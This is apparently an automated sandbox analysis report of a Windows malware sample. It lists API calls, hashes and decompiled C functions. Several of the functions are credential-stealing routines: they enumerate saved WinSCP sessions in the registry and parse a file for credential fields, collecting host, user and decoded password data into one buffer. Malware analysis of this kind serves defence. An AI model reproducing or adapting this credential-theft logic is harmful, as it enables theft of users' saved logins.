                                                                    0x0040fbc7
                                                                    0x0040fbd5
                                                                    0x0040fbe8
                                                                    0x0040fbfa
                                                                    0x0040fc08
                                                                    0x0040fc1a
                                                                    0x0040fc20
                                                                    0x0040fc2c
                                                                    0x0040fc33
                                                                    0x0040fc3e
                                                                    0x0040fc55
                                                                    0x0040fc5b
                                                                    0x0040fc60
                                                                    0x0040fc73
                                                                    0x0040fc79
                                                                    0x0040fc7f
                                                                    0x0040fc8b
                                                                    0x0040fc91
                                                                    0x0040fc96
                                                                    0x0040fc9e
                                                                    0x0040fcac
                                                                    0x0040fcb2
                                                                    0x0040fcc0
                                                                    0x0040fcc2
                                                                    0x0040fcc8
                                                                    0x0040fcd6
                                                                    0x0040fcdc
                                                                    0x0040fcea
                                                                    0x0040fcf0
                                                                    0x0040fcfe
                                                                    0x0040fd04
                                                                    0x0040fd12
                                                                    0x0040fd18
                                                                    0x0040fd1e
                                                                    0x0040fd21
                                                                    0x0040fd26
                                                                    0x0040fd27
                                                                    0x0040fd35
                                                                    0x0040fd3e
                                                                    0x0040fd37
                                                                    0x0040fd37
                                                                    0x0040fd37
                                                                    0x0040fd4b
                                                                    0x0040fd4c
                                                                    0x0040fd52
                                                                    0x0040fd58
                                                                    0x0040fd5d
                                                                    0x0040fd66
                                                                    0x0040fd6f
                                                                    0x0040fd68
                                                                    0x0040fd68
                                                                    0x0040fd68
                                                                    0x0040fd7c
                                                                    0x0040fd7d
                                                                    0x0040fd8a
                                                                    0x0040fd92
                                                                    0x0040fd9f
                                                                    0x0040fda7
                                                                    0x0040fdb4
                                                                    0x0040fdbc
                                                                    0x0040fdc9
                                                                    0x0040fdd1
                                                                    0x0040fdde
                                                                    0x0040fde6
                                                                    0x0040fdf3
                                                                    0x0040fdfb
                                                                    0x0040fe08
                                                                    0x0040fe14
                                                                    0x0040fe1a
                                                                    0x0040fe27
                                                                    0x0040fc96
                                                                    0x0040fe49
                                                                    0x0040fe4e
                                                                    0x0040fe57
                                                                    0x0040fe64
                                                                    0x0040fe6a
                                                                    0x0040fe86

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0040FB53
                                                                    • lstrcatA.KERNEL32(?,004132CB,0043C8D8,?), ref: 0040FB68
                                                                      • Part of subcall function 00415EF6: _malloc.LIBCMT ref: 00415EFC
                                                                      • Part of subcall function 00415EF6: GetTickCount.KERNEL32 ref: 00415F07
                                                                      • Part of subcall function 00415EF6: _rand.LIBCMT ref: 00415F1C
                                                                      • Part of subcall function 00415EF6: wsprintfA.USER32 ref: 00415F2F
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040FB7E
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040FB8E
                                                                    • _memset.LIBCMT ref: 0040FB9F
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 0040FBB4
                                                                    • lstrcatA.KERNEL32(?), ref: 0040FBC7
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 0040FBD5
                                                                    • lstrcatA.KERNEL32(?,?), ref: 0040FBE8
                                                                    • lstrcatA.KERNEL32(?,0043F090), ref: 0040FBFA
                                                                    • lstrcatA.KERNEL32(?,?), ref: 0040FC08
                                                                    • lstrcatA.KERNEL32(?,.txt), ref: 0040FC1A
                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040FC6C
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040FC73
                                                                    • StrCmpCA.SHLWAPI(00000000,00438004), ref: 0040FD2D
                                                                    • lstrcatA.KERNEL32(?,FALSE), ref: 0040FD4C
                                                                    • StrCmpCA.SHLWAPI(?,00438004), ref: 0040FD5E
                                                                    • lstrcatA.KERNEL32(?,FALSE), ref: 0040FD7D
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040FD8A
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040FD92
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040FD9F
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040FDA7
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040FDB4
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040FDBC
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040FDC9
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040FDD1
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040FDDE
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040FDE6
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040FDF3
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 0040FDFB
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040FE08
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0040FE14
                                                                    • lstrlen.KERNEL32(00000000), ref: 0040FE31
                                                                    • DeleteFileA.KERNEL32(?), ref: 0040FE72
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$FileHeap_memset$AllocCopyCountDeleteProcessTick_malloc_randlstrlenwsprintf
                                                                    • String ID: .txt$FALSE$TRUE
                                                                    • API String ID: 2229245506-132372592
                                                                    • Opcode ID: 9eaee0db088990305f33169482a61d647fb440c1bd852cb5624de3474f48e72a
                                                                    • Instruction ID: 6d0c1cedb359ae07f58dec168b54c3305e13e0f553fd3335cac7b6417128e00b
                                                                    • Opcode Fuzzy Hash: 9eaee0db088990305f33169482a61d647fb440c1bd852cb5624de3474f48e72a
                                                                    • Instruction Fuzzy Hash: 3A91F275940218AFCF216BB0EC4DACEBB78BB0E361F1104B5F605E2161DB749A848F69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00411867 Relevance: 63.3, APIs: 33, Strings: 3, Instructions: 332stringregistryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 82%
                                                                    			E00411867(void* __ebx, CHAR* __edi, void* __esi, void* __eflags) {
				intOrPtr _t125;
				intOrPtr* _t136;
				void* _t161;
				void* _t178;
				long _t182;
				void* _t186;
				CHAR* _t189;
				CHAR* _t191;
				char* _t199;
				char* _t200;
				char* _t201;
				intOrPtr _t213;
				intOrPtr _t214;
				intOrPtr _t219;
				intOrPtr* _t220;
				void* _t224;

				_t216 = __edi;
				_push(0xdfc);
				E0042083E(E004347CC, __ebx, __edi, __esi);
				 *(_t224 - 0xde8) = 0;
				 *(_t224 - 0x118) = 0;
				E00426300(_t224 - 0x117, 0, 0x103);
				_t218 = 0x3ff;
				 *(_t224 - 0xdec) = 0x104;
				 *(_t224 - 0xd18) = 0;
				E00426300(_t224 - 0xd17, 0, 0x3ff);
				 *(_t224 - 0x918) = 0;
				E00426300(_t224 - 0x917, 0, 0x3ff);
				 *((char*)(_t224 - 0x518)) = 0;
				E00426300(_t224 - 0x517, 0, 0x3ff);
				_t11 = _t218 + 1; // 0x400
				_t125 = _t11;
				_t213 = _t125;
				_t199 = _t224 - 0xd18;
				goto L1;
				do {
					L3:
					 *_t200 = 0;
					_t200 = _t200 + 1;
					_t214 = _t214 - 1;
				} while (_t214 != 0);
				_t215 = _t125;
				_t201 = _t224 - 0x518;
				do {
					 *_t201 = 0;
					_t201 = _t201 + 1;
					_t215 = _t215 - 1;
				} while (_t215 != 0);
				 *((intOrPtr*)(_t224 - 0xdf8)) = _t125;
				 *((intOrPtr*)(_t224 - 0xdf0)) = _t125;
				 *((intOrPtr*)(_t224 - 0xe00)) = _t125;
				if(RegOpenKeyExW(0x80000001, L"Software\\Martin Prikryl\\WinSCP 2\\Configuration", 0, 1, _t224 - 0xde0) != 0) {
					L33:
					return E00420888(0, _t216, _t218);
				}
				_t219 = 0xf;
				 *(_t224 - 0xd3c) = 0x3ff;
				 *((intOrPtr*)(_t224 - 0xd40)) = 0;
				 *((char*)(_t224 - 0xd50)) = 0;
				E00404331(_t224 - 0xd50,  *0x446000);
				 *(_t224 - 4) = 0;
				 *((intOrPtr*)(_t224 - 0xd58)) = _t219;
				 *((intOrPtr*)(_t224 - 0xd5c)) = 0;
				 *((char*)(_t224 - 0xd6c)) = 0;
				E00404331(_t224 - 0xd6c,  *0x4461a8);
				 *(_t224 - 4) = 1;
				_t220 = E004160E8(_t224 - 0xd50, _t224 - 0xdc0);
				 *(_t224 - 4) = 2;
				_t136 = E004160E8(_t224 - 0xd6c, _t224 - 0xddc);
				 *(_t224 - 4) = 3;
				if( *((intOrPtr*)(_t220 + 0x14)) >= 8) {
					_t220 =  *_t220;
				}
				if( *((intOrPtr*)(_t136 + 0x14)) >= 8) {
					_t136 =  *_t136;
				}
				 *((char*)(_t224 - 0xde1)) =  *0x446270( *(_t224 - 0xde0), _t136, _t220, 0x10, 0, _t224 - 0xe04, _t224 - 0xe08) != 0;
				_t216 = 0;
				E0040C148(0, _t224 - 0xddc, 1);
				_t218 = _t224 - 0xdc0;
				E0040C148(0, _t224 - 0xdc0, 1);
				E00404354(_t224 - 0xd6c, 1, 0);
				 *(_t224 - 4) =  *(_t224 - 4) | 0xffffffff;
				E00404354(_t224 - 0xd50, 1, 0);
				if( *((intOrPtr*)(_t224 - 0xde1)) != 0 &&  *(_t224 - 0xde0) != 0) {
					RegCloseKey( *(_t224 - 0xde0));
					 *(_t224 - 0xde0) = 0;
				}
				if( *((intOrPtr*)(_t224 - 0xe04)) == 0) {
					L17:
					if( *(_t224 - 0xde0) != 0) {
						RegCloseKey( *(_t224 - 0xde0));
						 *(_t224 - 0xde0) = 0;
					}
					goto L19;
				} else {
					if( *(_t224 - 0xde0) == 0) {
						L19:
						if(RegOpenKeyExW(0x80000001, L"Software\\Martin Prikryl\\WinSCP 2\\Sessions", 0, 9, _t224 - 0xde0) != 0) {
							goto L33;
						}
						if(RegEnumKeyExA( *(_t224 - 0xde0), 0, _t224 - 0x118, _t224 - 0xdec, 0, 0, 0, 0) != 0) {
							L31:
							if( *(_t224 - 0xde0) != 0) {
								RegCloseKey( *(_t224 - 0xde0));
							}
							goto L33;
						} else {
							goto L21;
						}
						do {
							L21:
							lstrcatA( *0x446250, 0x43c8dc);
							lstrcatA( *0x446250,  *0x445bf8);
							lstrcatA( *0x446250, 0x43c8dc);
							lstrcatA( *0x446250,  *0x446100);
							 *0x446310( *(_t224 - 0xde0), _t224 - 0x118,  *0x445b68, 2, 0, _t224 - 0xd18, _t224 - 0xdf8);
							lstrcatA( *0x446250, _t224 - 0xd18);
							_t216 = 4;
							 *(_t224 - 0xdf4) = _t216;
							_t161 =  *0x446310( *(_t224 - 0xde0), _t224 - 0x118,  *0x445c9c, 0xffff, 0, _t224 - 0xdfc, _t224 - 0xdf4);
							_t246 = _t161;
							if(_t161 != 0) {
								lstrcatA( *0x446250, ":22");
							} else {
								_push( *((intOrPtr*)(_t224 - 0xdfc)));
								_t191 = E00415F45(0, _t224 - 0xd88, _t215, _t216, 0x43c8dc, _t246);
								 *(_t224 - 4) = _t216;
								if(_t191[0x14] >= 0x10) {
									_t191 =  *_t191;
								}
								lstrcatA( *0x446250, _t191);
								 *(_t224 - 4) =  *(_t224 - 4) | 0xffffffff;
								E00404354(_t224 - 0xd88, 1, 0);
							}
							lstrcatA( *0x446250, 0x43c8dc);
							lstrcatA( *0x446250,  *0x445c48);
							 *0x446310( *(_t224 - 0xde0), _t224 - 0x118,  *0x446178, 2, 0, _t224 - 0x918, _t224 - 0xdf0);
							lstrcatA( *0x446250, _t224 - 0x918);
							 *((intOrPtr*)(_t224 - 0xd20)) = 0xf;
							 *((intOrPtr*)(_t224 - 0xd24)) = 0;
							 *(_t224 - 0xd34) = 0;
							 *(_t224 - 4) = 5;
							 *0x446310( *(_t224 - 0xde0), _t224 - 0x118,  *0x445da8, 2, 0, _t224 - 0x518, _t224 - 0xe00);
							lstrcatA( *0x446250, 0x43c8dc);
							lstrcatA( *0x446250,  *0x4460c4);
							_t178 =  *0x446458(_t224 - 0x518, 0x43c8d8);
							_t248 = _t178;
							if(_t178 != 0) {
								_t215 = _t224 - 0xda4;
								_t186 = E004113E3(0, _t224 - 0x518, _t224 - 0xda4, _t216, 0x43c8dc, _t248, _t224 - 0xd18, _t224 - 0x918);
								_t216 = _t224 - 0xd34;
								 *(_t224 - 4) = 6;
								E004042ED(_t216, _t186);
								 *(_t224 - 4) = 5;
								E00404354(_t224 - 0xda4, 1, 0);
								_t189 =  *(_t224 - 0xd34);
								if( *((intOrPtr*)(_t224 - 0xd20)) < 0x10) {
									_t189 = _t216;
								}
								lstrcatA( *0x446250, _t189);
							}
							lstrcatA( *0x446250, "\n\n");
							 *(_t224 - 0xde8) =  *(_t224 - 0xde8) + 1;
							 *(_t224 - 0xdec) = 0x104;
							_t182 = RegEnumKeyExA( *(_t224 - 0xde0),  *(_t224 - 0xde8), _t224 - 0x118, _t224 - 0xdec, 0, 0, 0, 0);
							 *(_t224 - 4) =  *(_t224 - 4) | 0xffffffff;
							_t218 = _t182;
							E00404354(_t224 - 0xd34, 1, 0);
						} while (_t182 != 0x103);
						goto L31;
					}
					RegCloseKey( *(_t224 - 0xde0));
					 *(_t224 - 0xde0) = 0;
					goto L17;
				}
				L1:
				 *_t199 = 0;
				_t199 = _t199 + 1;
				_t213 = _t213 - 1;
				if(_t213 != 0) {
					goto L1;
				} else {
					_t214 = _t125;
					_t200 = _t224 - 0x918;
					goto L3;
				}
			}



















                                                                    0x00411867
                                                                    0x00411867
                                                                    0x00411871
                                                                    0x00411885
                                                                    0x0041188b
                                                                    0x00411891
                                                                    0x00411899
                                                                    0x004118a7
                                                                    0x004118b1
                                                                    0x004118b7
                                                                    0x004118c8
                                                                    0x004118ce
                                                                    0x004118df
                                                                    0x004118e5
                                                                    0x004118ea
                                                                    0x004118ea
                                                                    0x004118f0
                                                                    0x004118f2
                                                                    0x004118f2
                                                                    0x00411906
                                                                    0x00411906
                                                                    0x00411906
                                                                    0x00411908
                                                                    0x00411909
                                                                    0x00411909
                                                                    0x0041190c
                                                                    0x0041190e
                                                                    0x00411914
                                                                    0x00411914
                                                                    0x00411916
                                                                    0x00411917
                                                                    0x00411917
                                                                    0x0041191a
                                                                    0x00411920
                                                                    0x00411926
                                                                    0x00411948
                                                                    0x00411da0
                                                                    0x00411da5
                                                                    0x00411da5
                                                                    0x00411950
                                                                    0x0041195d
                                                                    0x00411963
                                                                    0x00411969
                                                                    0x0041196f
                                                                    0x00411974
                                                                    0x00411983
                                                                    0x00411989
                                                                    0x0041198f
                                                                    0x00411995
                                                                    0x004119a7
                                                                    0x004119b0
                                                                    0x004119bf
                                                                    0x004119c3
                                                                    0x004119c8
                                                                    0x004119d0
                                                                    0x004119d2
                                                                    0x004119d2
                                                                    0x004119d8
                                                                    0x004119da
                                                                    0x004119da
                                                                    0x004119fd
                                                                    0x00411a06
                                                                    0x00411a0e
                                                                    0x00411a15
                                                                    0x00411a1b
                                                                    0x00411a29
                                                                    0x00411a2e
                                                                    0x00411a3b
                                                                    0x00411a46
                                                                    0x00411a56
                                                                    0x00411a5c
                                                                    0x00411a5c
                                                                    0x00411a68
                                                                    0x00411a84
                                                                    0x00411a8a
                                                                    0x00411a92
                                                                    0x00411a98
                                                                    0x00411a98
                                                                    0x00000000
                                                                    0x00411a6a
                                                                    0x00411a70
                                                                    0x00411a9e
                                                                    0x00411aba
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00411ae1
                                                                    0x00411d8c
                                                                    0x00411d92
                                                                    0x00411d9a
                                                                    0x00411d9a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00411ae7
                                                                    0x00411ae7
                                                                    0x00411af3
                                                                    0x00411b05
                                                                    0x00411b12
                                                                    0x00411b24
                                                                    0x00411b4e
                                                                    0x00411b61
                                                                    0x00411b69
                                                                    0x00411b91
                                                                    0x00411b97
                                                                    0x00411b9d
                                                                    0x00411b9f
                                                                    0x00411be9
                                                                    0x00411ba1
                                                                    0x00411ba1
                                                                    0x00411bad
                                                                    0x00411bb2
                                                                    0x00411bb9
                                                                    0x00411bbb
                                                                    0x00411bbb
                                                                    0x00411bc4
                                                                    0x00411bca
                                                                    0x00411bd7
                                                                    0x00411bd7
                                                                    0x00411bf6
                                                                    0x00411c08
                                                                    0x00411c32
                                                                    0x00411c45
                                                                    0x00411c4b
                                                                    0x00411c55
                                                                    0x00411c5b
                                                                    0x00411c72
                                                                    0x00411c8c
                                                                    0x00411c99
                                                                    0x00411cab
                                                                    0x00411cbd
                                                                    0x00411cc3
                                                                    0x00411cc5
                                                                    0x00411cdb
                                                                    0x00411ce1
                                                                    0x00411ce8
                                                                    0x00411cee
                                                                    0x00411cf2
                                                                    0x00411d00
                                                                    0x00411d04
                                                                    0x00411d10
                                                                    0x00411d16
                                                                    0x00411d18
                                                                    0x00411d18
                                                                    0x00411d21
                                                                    0x00411d21
                                                                    0x00411d32
                                                                    0x00411d38
                                                                    0x00411d56
                                                                    0x00411d66
                                                                    0x00411d6c
                                                                    0x00411d79
                                                                    0x00411d7b
                                                                    0x00411d80
                                                                    0x00000000
                                                                    0x00411ae7
                                                                    0x00411a78
                                                                    0x00411a7e
                                                                    0x00000000
                                                                    0x00411a7e
                                                                    0x004118f8
                                                                    0x004118f8
                                                                    0x004118fa
                                                                    0x004118fb
                                                                    0x004118fc
                                                                    0x00000000
                                                                    0x004118fe
                                                                    0x004118fe
                                                                    0x00411900
                                                                    0x00000000
                                                                    0x00411900

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00411871
                                                                    • _memset.LIBCMT ref: 00411891
                                                                    • _memset.LIBCMT ref: 004118B7
                                                                    • _memset.LIBCMT ref: 004118CE
                                                                    • _memset.LIBCMT ref: 004118E5
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,00000000,000003FF,?,?), ref: 00411940
                                                                    • RegGetValueW.ADVAPI32(?,00000000,00000000,00000010,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004119F5
                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000,00000001,00000000,00000001,00000001,?,?,?,?,?,?,?,?,00000000), ref: 00411A56
                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000,00000001,00000000,00000001,00000001,?,?,?,?,?,?,?,?,00000000), ref: 00411A78
                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000,00000001,00000000,00000001,00000001,?,?,?,?,?,?,?,?,00000000), ref: 00411A92
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,00000001,00000000,00000001,00000000,00000001,00000001,?), ref: 00411AB2
                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00411AD9
                                                                    • lstrcatA.KERNEL32(0043C8DC,?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411AF3
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411B05
                                                                    • lstrcatA.KERNEL32(0043C8DC,?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411B12
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411B24
                                                                    • RegGetValueA.ADVAPI32(?,?,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000,000003FF,?), ref: 00411B4E
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411B61
                                                                    • RegGetValueA.ADVAPI32(?,?,0000FFFF,00000000,?,?,?,?,?,?,?,?,?,00000000,000003FF,?), ref: 00411B97
                                                                    • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411BC4
                                                                    • lstrcatA.KERNEL32(:22,?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411BE9
                                                                    • lstrcatA.KERNEL32(0043C8DC,?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411BF6
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411C08
                                                                    • RegGetValueA.ADVAPI32(?,?,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000,000003FF,?), ref: 00411C32
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411C45
                                                                    • RegGetValueA.ADVAPI32(?,?,00000002,00000000,?,?), ref: 00411C8C
                                                                    • lstrcatA.KERNEL32(0043C8DC), ref: 00411C99
                                                                    • lstrcatA.KERNEL32 ref: 00411CAB
                                                                    • StrCmpCA.SHLWAPI(?,0043C8D8), ref: 00411CBD
                                                                    • lstrcatA.KERNEL32(?,00000001,00000000,?,?), ref: 00411D21
                                                                    • lstrcatA.KERNEL32(0043EC3C), ref: 00411D32
                                                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00411D66
                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,000003FF,?,?,?), ref: 00411D9A
                                                                      • Part of subcall function 004113E3: __EH_prolog3.LIBCMT ref: 004113FC
                                                                      • Part of subcall function 004113E3: GetProcessHeap.KERNEL32(00000008,?,?,?,00000024), ref: 00411451
                                                                      • Part of subcall function 004113E3: HeapAlloc.KERNEL32(00000000,?,?,00000024), ref: 00411458
                                                                      • Part of subcall function 004113E3: GetProcessHeap.KERNEL32(00000000,?,?,?,00000024), ref: 0041146D
                                                                      • Part of subcall function 004113E3: HeapFree.KERNEL32(00000000,?,?,00000024), ref: 00411474
                                                                      • Part of subcall function 004042ED: _memmove.LIBCMT ref: 00404309
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                    Strings
                                                                    • Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 00411936
                                                                    • Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 00411AA8
                                                                    • :22, xrefs: 00411BDE
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$Value$CloseHeap_memset$EnumOpenProcess_memmove$AllocFreeH_prolog3H_prolog3_
                                                                    • String ID: :22$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions
                                                                    • API String ID: 3365208532-2123096617
                                                                    • Opcode ID: 68eb35987e60646b8661059df4dd610109fdd1f21b03d625ac238be56bbafd02
                                                                    • Instruction ID: 09a1173645d4c4ea0742f84c8dcd22c964316ef488497ec39e675a86579081bf
                                                                    • Opcode Fuzzy Hash: 68eb35987e60646b8661059df4dd610109fdd1f21b03d625ac238be56bbafd02
                                                                    • Instruction Fuzzy Hash: C7E12875900169AFDF21AF90DC44AEEBB79FB06344F0100EBE509A6161DB746EC8CF69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040F878 Relevance: 49.7, APIs: 33, Instructions: 182stringfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 72%
                                                                    			E0040F878(CHAR* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t52;
				char* _t66;
				char* _t74;
				void* _t83;
				void* _t93;
				void* _t94;
				long _t95;
				char* _t96;
				char* _t97;
				char* _t99;
				char* _t100;
				char* _t102;
				char* _t103;
				CHAR* _t106;
				void* _t107;
				void* _t108;
				signed int _t110;
				void* _t112;

				_t93 = __edx;
				_t110 = _t112 - 0x98;
				_t33 =  *0x443674; // 0x393162b1
				 *(_t110 + 0x94) = _t33 ^ _t110;
				_push(0x446204);
				 *(_t110 - 0x7c) =  *(_t110 + 0xa0);
				_t106 = __ecx;
				if(E0041EA23() < 0x20) {
					_push(_t83);
					E00426300(_t110 - 0x70, 0, 0x104);
					lstrcatA(_t110 - 0x70, _t106);
					lstrcatA(_t110 - 0x70, 0x43c8e0);
					lstrcatA(_t110 - 0x70,  *0x4461d8);
					_t108 = CreateFileA(_t110 - 0x70, 0x80000000, 1, 0, 3, 0, 0);
					 *(_t110 - 0x78) = _t108;
					_t117 = _t108;
					if(_t108 != 0) {
						_push(_t94);
						SetFilePointer(_t108, 0, 0, 2);
						_t95 = GetFileSize(_t108, 0);
						SetFilePointer(_t108, 0, 0, 0);
						_t11 = _t95 + 1; // 0x1
						_t52 = E0041D05B(0, _t93, _t95, _t108, _t117, _t11);
						 *(_t110 - 0x74) = _t52;
						ReadFile(_t108, _t52, _t95, _t110 - 0x80, 0);
						_t96 = StrStrA( *(_t110 - 0x74),  *0x445b80);
						if(_t96 != 0) {
							do {
								_t16 =  *0x446320( *0x445b80) + 3; // 0x3
								 *(_t110 - 0x74) = _t96 + _t16;
								_t97 = StrStrA(_t96 + _t16,  *0x445da4);
								 *((char*)(_t97 - 3)) = 0;
								lstrcatA( *0x446250, 0x43c8dc);
								lstrcatA( *0x446250,  *0x445e44);
								lstrcatA( *0x446250,  *(_t110 - 0x7c));
								lstrcatA( *0x446250, 0x43c8dc);
								lstrcatA( *0x446250,  *0x446100);
								lstrcatA( *0x446250,  *(_t110 - 0x74));
								lstrcatA( *0x446250, 0x43c8dc);
								_t66 = StrStrA(_t97 + 0xfffffffe,  *0x445fc0);
								_t99 = _t66;
								_t22 =  *0x446320( *0x445fc0) + 3; // 0x3
								 *(_t110 - 0x74) =  &(_t99[_t22]);
								_t100 = StrStrA( &(_t99[_t22]),  *0x445fbc);
								 *((char*)(_t100 - 3)) = 0;
								lstrcatA( *0x446250,  *0x445c48);
								lstrcatA( *0x446250, E0040E3F0( *(_t110 - 0x74), _t93));
								lstrcatA( *0x446250, 0x43c8dc);
								_t74 = StrStrA(_t100 + 0xfffffffe,  *0x445fbc);
								_t102 = _t74;
								_t27 =  *0x446320( *0x445fbc) + 3; // 0x3
								 *(_t110 - 0x74) =  &(_t102[_t27]);
								_t103 = StrStrA( &(_t102[_t27]),  *0x446114);
								 *((char*)(_t103 - 3)) = 0;
								lstrcatA( *0x446250,  *0x4460c4);
								lstrcatA( *0x446250, E0040E3F0( *(_t110 - 0x74), _t93));
								lstrcatA( *0x446250, "\n\n");
								_t96 = StrStrA(_t103 + 0xfffffffe,  *0x445b80);
							} while (_t96 != 0);
							_t108 =  *(_t110 - 0x78);
						}
						CloseHandle(_t108);
						_pop(_t94);
					}
					_t36 =  *0x446254();
					_pop(_t83);
				}
				_pop(_t107);
				return E0041DA9B(_t36, _t83,  *(_t110 + 0x94) ^ _t110, _t93, _t94, _t107);
			}

























                                                                    0x0040f878
                                                                    0x0040f879
                                                                    0x0040f886
                                                                    0x0040f88d
                                                                    0x0040f89a
                                                                    0x0040f89f
                                                                    0x0040f8a2
                                                                    0x0040f8ad
                                                                    0x0040f8b3
                                                                    0x0040f8c0
                                                                    0x0040f8cd
                                                                    0x0040f8dc
                                                                    0x0040f8ec
                                                                    0x0040f908
                                                                    0x0040f90a
                                                                    0x0040f90d
                                                                    0x0040f90f
                                                                    0x0040f915
                                                                    0x0040f91b
                                                                    0x0040f92d
                                                                    0x0040f92f
                                                                    0x0040f935
                                                                    0x0040f939
                                                                    0x0040f947
                                                                    0x0040f94a
                                                                    0x0040f95f
                                                                    0x0040f963
                                                                    0x0040f96e
                                                                    0x0040f980
                                                                    0x0040f985
                                                                    0x0040f98e
                                                                    0x0040f991
                                                                    0x0040f99a
                                                                    0x0040f9ac
                                                                    0x0040f9bb
                                                                    0x0040f9c8
                                                                    0x0040f9da
                                                                    0x0040f9e9
                                                                    0x0040f9f6
                                                                    0x0040fa06
                                                                    0x0040fa12
                                                                    0x0040fa20
                                                                    0x0040fa25
                                                                    0x0040fa34
                                                                    0x0040fa36
                                                                    0x0040fa3f
                                                                    0x0040fa54
                                                                    0x0040fa61
                                                                    0x0040fa71
                                                                    0x0040fa7d
                                                                    0x0040fa8b
                                                                    0x0040fa90
                                                                    0x0040fa9f
                                                                    0x0040faa1
                                                                    0x0040faaa
                                                                    0x0040fabf
                                                                    0x0040fad0
                                                                    0x0040fae6
                                                                    0x0040fae8
                                                                    0x0040faf0
                                                                    0x0040faf0
                                                                    0x0040faf4
                                                                    0x0040fafa
                                                                    0x0040fafa
                                                                    0x0040fafb
                                                                    0x0040fb01
                                                                    0x0040fb01
                                                                    0x0040fb0a
                                                                    0x0040fb17

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0040F8C0
                                                                    • lstrcatA.KERNEL32(?,?,?,?,0043C8D8), ref: 0040F8CD
                                                                    • lstrcatA.KERNEL32(?,0043C8E0,?,?,0043C8D8), ref: 0040F8DC
                                                                    • lstrcatA.KERNEL32(?,?,?,0043C8D8), ref: 0040F8EC
                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,0043C8D8), ref: 0040F902
                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,004132CB,?,?,0043C8D8), ref: 0040F91B
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,0043C8D8), ref: 0040F923
